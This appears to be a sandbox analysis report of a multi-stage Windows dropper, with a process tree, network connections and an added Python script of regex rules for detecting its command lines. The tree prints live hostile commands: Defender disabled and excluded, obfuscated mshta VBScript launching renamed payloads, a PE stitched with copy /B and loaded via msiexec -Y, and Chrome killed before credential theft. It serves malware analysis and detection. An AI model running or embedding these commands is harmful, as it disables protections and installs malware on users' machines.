| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331518534095" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4712 -ip 4712
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe
Tue19cd42a7c874e44.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe
Tue19b4b38a7569a9.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe
Tue1932df4dae.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe
Tue197e9ec0ff0.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe
Tue19cef5687a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe
Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe
Tue19c9e031f4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe
Tue19ac3c92c21.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe
Tue1968b7ee9058232e8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe
Tue193129b31e741ef3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe
Tue196397c0f84f8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe
Tue192c34b1c2f5.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe
Tue19c28f648204dbd4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe
Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp" /SL5="$C0068,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 620
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp" /SL5="$20230,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4088 -ip 4088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 360
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue1932df4dae.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffd772cc40,0x7fffd772cc4c,0x7fffd772cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2200,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3712,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4948 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5028,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3748,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3468,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3804 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2128,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3908,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2100 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3552,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3480 /prefetch:2
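The process tree above carries the behaviours a detection engineer would want to key on: Defender real-time protection switched off and a Temp exclusion added, mshta.exe executing inline VBScript, a dropped executable copied under a random name and the original killed with taskkill, a PE stitched back together from chunks by echoing "MZ" and joining pieces with copy /B, that file loaded through msiexec -Y (the /y switch registers a DLL, i.e. calls its DllRegisterServer), and chrome.exe force-killed before its profile is read. The script below is an added example, not part of the sandbox report or any vendor tooling: it runs a small rule set over command lines copied from the Processes section (the chrome renderer line is shortened and serves as a negative control). The rule names and the functions `triage`, `triage_report` and `triage_many` are assumptions made for this example. Every pattern is case-insensitive because the sample mixes case on purpose (tYPe, stART, CoPy, VbscrIPt), which defeats case-sensitive string matches, and the quote-tolerant patterns account for the doubled quotes (`""`) that appear once cmd.exe is nested inside the VBScript string.

```python
"""Command-line triage rules for the process tree in this report.

Added example; not code from the sandbox report or its vendor.
Rule names, function names and the expected labels are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    note: str


# (rule name, pattern, analyst note). re.I everywhere: the sample mixes
# case to evade naive matching. Quote classes use \"* rather than \"?
# because cmd lines nested in the VBScript string carry doubled quotes.
RULES = [
    ("defender_realtime_off",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I),
     "Defender real-time protection disabled"),
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
     "Defender path exclusion added"),
    ("mshta_inline_vbscript",
     re.compile(r"mshta(\.exe)?\"?\s+vbscript:", re.I),
     "mshta running inline VBScript, no .hta file on disk"),
    ("pe_stitched_from_chunks",
     re.compile(r"set\s*/p\s*=\s*\"*MZ\"*.*copy\s+/b", re.I | re.S),
     "'MZ' header echoed, then chunks joined with copy /B"),
    ("msiexec_regserver_nonmsi",
     re.compile(r"msiexec(\.exe)?\s+(-|/)y\s+(?!.*\.msi\b)\S+", re.I),
     "msiexec -y loads an arbitrary DLL via DllRegisterServer"),
    ("copy_rename_then_taskkill_self",
     re.compile(r"type\s+\"*[^\"]+\.exe\"*\s*>\s*\S+\.exe.*taskkill", re.I | re.S),
     "executable copied under a new name, original image killed"),
    ("browser_killed",
     re.compile(r"taskkill\s+/f\s+/im\s+chrome\.exe", re.I),
     "chrome.exe force-killed before its profile data is read"),
]


def triage(command_line: str) -> list[Finding]:
    """Return every rule that fires on one command line, in rule order."""
    return [Finding(name, note) for name, pat, note in RULES if pat.search(command_line)]


def triage_report(command_lines: list[str]) -> list[list[str]]:
    """Per-line list of rule names, aligned with the input order."""
    return [[f.rule for f in triage(cl)] for cl in command_lines]


def triage_many(command_lines: list[str]) -> dict[str, int]:
    """Rule hit counts across a whole process tree."""
    counts: dict[str, int] = {}
    for cl in command_lines:
        for f in triage(cl):
            counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Command lines copied from the Processes section of this report.
# The final Chrome renderer line is shortened and is the negative control.
SAMPLES = [
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r'"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))',
    r'"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )',
    r'msiexec -Y .\bENCc.E',
    r'taskkill /f /im chrome.exe',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US',
]


if __name__ == "__main__":
    for cl, hits in zip(SAMPLES, triage_report(SAMPLES)):
        print(f"{hits or ['-']}  {cl[:70]}")
    print(triage_many(SAMPLES))
```

Two points for anyone turning these into production detections: match on the full command line rather than the image name, since in this tree the interesting content sits in cmd.exe and mshta.exe arguments while the image names are all legitimate Windows binaries; and treat the msiexec rule as a hunt rather than a block, because /y on a signed vendor DLL is a legitimate installer action and only the combination with a freshly stitched file in a user-writable directory is what stands out here.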
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.16.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| NL | 45.9.20.13:80 | | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| N/A | 127.0.0.1:54599 | N/A | tcp |
| N/A | 127.0.0.1:54603 | N/A | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.179.234:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 142.250.179.234:443 | ogads-pa.googleapis.com | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
